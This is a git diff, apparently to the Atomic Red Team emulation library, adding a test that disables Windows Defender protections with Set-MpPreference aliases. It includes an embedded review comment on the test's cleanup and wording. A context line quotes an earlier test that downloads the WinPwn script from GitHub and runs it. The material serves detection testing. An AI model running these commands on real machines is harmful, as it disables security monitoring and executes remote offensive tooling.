diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 569814e5..5cad3045 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -302,6 +302,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defen
defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 9bdce6f5..ad6e3f4c 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -227,6 +227,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defen
defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 4e82a18a..a1f34e7a 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -440,6 +440,7 @@
- Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
+ - Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 117c4ca2..bb292eeb 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -336,6 +336,7 @@
- Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
- Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
+ - Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 66efdaec..5450808d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -17520,6 +17520,26 @@ defense-evasion:
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
-consoleoutput -noninteractive "
name: powershell
+ - name: Tamper with Windows Defender ATP using Aliases - PowerShell
+ auto_generated_guid: c531aa6e-9c97-4b29-afee-9b7be6fc8a64
+ description: |
+ Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
+ in Windows settings.
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ Set-MpPreference -drtm $True
+ Set-MpPreference -dbm $True
+ Set-MpPreference -dscrptsc $True
+ Set-MpPreference -dbaf $True
+ cleanup_command: |
+ Set-MpPreference -drtm 0
+ Set-MpPreference -dbm 0
+ Set-MpPreference -dscrptsc 0
+ Set-MpPreference -dbaf 0
+ name: powershell
+ elevation_required: true
T1601:
technique:
x_mitre_platforms:
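Review bot: The `cleanup_command` of the new test writes 0 to all four settings instead of restoring what the host had before, so a machine where one of them was already disabled ends up in a different state after cleanup. Reading the current values with `Get-MpPreference` before the change and writing those back would avoid that. The description says "scheduled scanning", but the aliases `-drtm`, `-dbm`, `-dscrptsc` and `-dbaf` map to DisableRealtimeMonitoring, DisableBehaviorMonitoring, DisableScriptScanning and DisableBlockAtFirstSeen; I would reword it to `Attempting to disable real-time monitoring, behavior monitoring, script scanning and block-at-first-seen using Set-MpPreference parameter aliases.` so detection authors know to match both the aliases and the full parameter names. With Tamper Protection enabled these calls are likely ignored without an error, so the description should state that it must be off for the test to have a visible effect. This index looks generated, so the edit belongs in the technique's source YAML; the same description repeats in the T1562.001.md hunk.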
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index 42449571..ef7fbdb1 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -66,6 +66,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
- [Atomic Test #30 - WinPwn - Kill the event log services for stealth](#atomic-test-30---winpwn---kill-the-event-log-services-for-stealth)
+- [Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31---tamper-with-windows-defender-atp-using-aliases---powershell)
+
@@ -1291,4 +1293,43 @@ inv-phantom -consoleoutput -noninteractive
+
+
+
+## Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShell
+Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
+in Windows settings.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c531aa6e-9c97-4b29-afee-9b7be6fc8a64
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+Set-MpPreference -drtm $True
+Set-MpPreference -dbm $True
+Set-MpPreference -dscrptsc $True
+Set-MpPreference -dbaf $True
+```
+
+#### Cleanup Commands:
+```powershell
+Set-MpPreference -drtm 0
+Set-MpPreference -dbm 0
+Set-MpPreference -dscrptsc 0
+Set-MpPreference -dbaf 0
+```
+
+
+
+
+